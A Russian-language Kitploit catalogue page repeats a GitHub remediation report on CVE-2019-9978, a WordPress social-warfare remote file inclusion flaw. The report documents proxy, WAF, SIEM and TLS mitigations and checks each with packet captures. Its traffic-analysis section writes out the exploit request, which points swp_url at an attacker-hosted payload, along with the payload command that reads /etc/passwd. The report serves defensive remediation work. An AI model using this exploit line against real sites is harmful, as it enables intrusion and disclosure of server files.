Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/b4ntgrim/vuln_remediation_megaquagga
Оборонительные ИнструментыАнализ уязвимостейВеб-безопасностьСетевая безопасностьОбучение и ОбразованиеРеагирование на ИнцидентыАнализ Журналов
GitHubb4ntgrim/vuln_remediation_megaquagga

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Vuln_Remediation_MegaQuagga

Репозиторий
34 месяцев назадЕщё не проверено

Описание

Отчёт об устранении для MegaQuagga Publishing, подтверждающий смягчение CVE-2019-9978 за счёт прогрессивного многоуровневого построения защиты. Документирует внедрение обратного прокси, развёртывание WAF ModSecurity, интеграцию SIEM Graylog и принудительное применение SSL/TLS с использованием многоэтапного анализа PCAP в Wireshark на интерфейсах WAN и LAN pfSense.

Поделиться

Уязвимость_Устранение_MegaQuagga

Отчет об устранении для MegaQuagga Publishing, подтверждающий смягчение CVE-2019-9978 с помощью прогрессивного многоуровневого защитного подхода. Документирует внедрение обратного прокси, развертывание WAF ModSecurity, интеграцию SIEM Graylog и принудительное применение SSL/TLS с использованием многоэтапного анализа Wireshark PCAP на интерфейсах WAN и LAN pfSense.

Устранение уязвимости — Отчет об устранении MegaQuagga

Аналитик: Samuel Weiss Организация: 0x2A Security Версия: 1.1 (27 апреля 2026 г.) Клиент: MegaQuagga Publishing Классификация: КОНФИДЕНЦИАЛЬНО


Обзор

В этом проекте документируется активное устранение уязвимостей, выявленных в ходе тестирования на проникновение MegaQuagga, с особым акцентом на CVE-2019-9978 (удаленное включение файла через плагин WordPress social-warfare). Устранение было подтверждено с помощью многоэтапного анализа захвата пакетов с использованием Wireshark на интерфейсах WAN и LAN pfSense, с последовательным применением защитных средств и повторным тестированием на каждом этапе.


Файлы

ФайлОписание
_VULN_REMEDIATION__MegaQuagga_Remediation_Report__Samuel_Weiss_.docxПолный отчет об устранении, включая резюме для руководства, принятые меры, доказательства устранения на основе PCAP и рекомендации на будущее
_VULN_REMEDIATION__PCAP_worksheet__Samuel_Weiss_.xlsxРабочий лист анализа PCAP, документирующий файлы захвата пакетов, трафик на каждом этапе устранения, IP-адреса источника/назначения, порты и аннотации TCP-потоков

Область охвата

  • Устраненная уязвимость: CVE-2019-9978 — удаленное включение файла (RFI) через плагин WordPress social-warfare
  • Среда: Сервер WordPress MegaQuagga Publishing с межсетевым экраном pfSense
  • Подход: Прогрессивное многоуровневое применение защиты с повторным выполнением эксплойта после каждого средства защиты для подтверждения эффективности

Выполненные действия по устранению

1. Внедрение обратного прокси

Обратный прокси был развернут перед веб-сервером WordPress, что изменило сетевую архитектуру таким образом, что прямой трафик к внутреннему серверу приложений стал невозможен из внешней сети. Данные PCAP подтвердили маршрутизацию трафика через слой прокси.

2. Межсетевой экран веб-приложений (WAF) — ModSecurity

ModSecurity был включен как слой WAF на обратном прокси. При повторном выполнении RFI эксплойта вредоносная нагрузка swp_url была заблокирована, и сервер вернул HTTP 403 Forbidden, что подтвердило срабатывание правила WAF на сигнатуру эксплойта. Активность предупреждений была подтверждена в SIEM Graylog.

3. Интеграция SIEM — Graylog

Graylog был настроен для централизованной агрегации журналов и мониторинга предупреждений. Были развернуты правила предупреждений ModSecurity для обнаружения сигнатур RFI эксплойтов, что обеспечило видимость попыток атак в реальном времени.

4. Принудительное применение SSL/TLS и усиление межсетевого экрана

  • На обратном прокси был развернут действительный SSL-сертификат с настроенной разгрузкой SSL
  • Правила межсетевого экрана pfSense WAN были обновлены, чтобы разрешить только HTTPS на порту 443
  • Правила NAT были обновлены в соответствии с новой политикой входящего трафика
  • При повторном тестировании нагрузка RFI была заблокирована и не смогла проникнуть в среду

Журнал захвата PCAP

ФайлДатаИнтерфейсФильтрПакетовЭтап
Red-Team-1.pcapng2025-01-03eth0 (Red-Team)нет4,013Базовая линия до устранения
Red-Team-2.pcapng2026-04-22eth0 (Red-Team)нет26,841До устранения (эксплойт подтвержден)
pfSense-WAN-1.pcap2026-04-22em0 (WAN)192.168.100.x46Трафик эксплойта на стороне WAN
pfSense-LAN-1.pcap2026-04-23em1 (LAN)192.168.100.x39Трафик эксплойта на стороне LAN (до прокси)
pfSense-LAN-2.pcap2026-04-23em1 (LAN)порт 80/800045После внедрения обратного прокси
pfSense-LAN-3.pcap2026-04-24em1 (LAN)порт 80/8000/4431,000После включения WAF (403 Forbidden подтвержден)
pfSense-LAN-4.pcap2026-04-25em1 (LAN)порт 81/8000/443534После разгрузки SSL (эксплойт заблокирован)

Поток трафика эксплойта — Анализ ключевых пакетов

До устранения (Red-Team-1 / pfSense-LAN-1)

root@kitploit:~
[Attacker] → GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://[attacker]:8000/payload.txt
[WordPress] → GET /payload.txt (извлекает PHP-нагрузку, размещенную злоумышленником)
[Attacker]  → Возвращает: <pre>system('cat /etc/passwd')</pre>
[WordPress] → Возвращает содержимое /etc/passwd злоумышленнику ✅ ЭКСПЛОЙТ УСПЕШЕН

После WAF (pfSense-LAN-3)

root@kitploit:~
[Attacker] → GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url=...
[WAF]       → HTTP 403 Forbidden ✅ ЭКСПЛОЙТ ЗАБЛОКИРОВАН

После принудительного SSL (pfSense-LAN-4)

root@kitploit:~
[Attacker] → Только HTTPS; порт HTTP 80 заблокирован на pfSense WAN
[pfSense]  → Нагрузка эксплойта не может достичь веб-сервера ✅ ЭКСПЛОЙТ ЗАБЛОКИРОВАН

Рекомендации на будущее

  1. Поддерживайте плагины в обновленном состоянии и проводите аудит — Обновите social-warfare до v3.5.3+; удалите неактивные плагины для уменьшения поверхности атаки
  2. Соблюдайте правила межсетевого экрана — Периодически проверяйте правила pfSense; держите порт 80 заблокированным или перенаправленным на HTTPS
  3. Непрерывно мониторьте оповещения SIEM — Регулярно просматривайте и обновляйте правила оповещений Graylog; назначайте ответственного за своевременное реагирование на оповещения
  4. Проводите регулярное сканирование уязвимостей — Планируйте рутинные сканирования сервера WordPress и окружающей инфраструктуры; устраняйте уязвимости в соответствии со сроками на основе уровня критичности
  5. Применяйте принцип минимальных привилегий — Ограничьте процессы веб-сервера и учетные записи WordPress минимально необходимыми разрешениями

Описание для GitHub

Отчет об устранении для MegaQuagga Publishing, подтверждающий смягчение CVE-2019-9978 с помощью прогрессивного многоуровневого защитного подхода. Документирует внедрение обратного прокси, развертывание WAF ModSecurity, интеграцию SIEM Graylog и принудительное применение SSL/TLS с использованием многоэтапного анализа Wireshark PCAP на интерфейсах WAN и LAN pfSense.

Скачать инструмент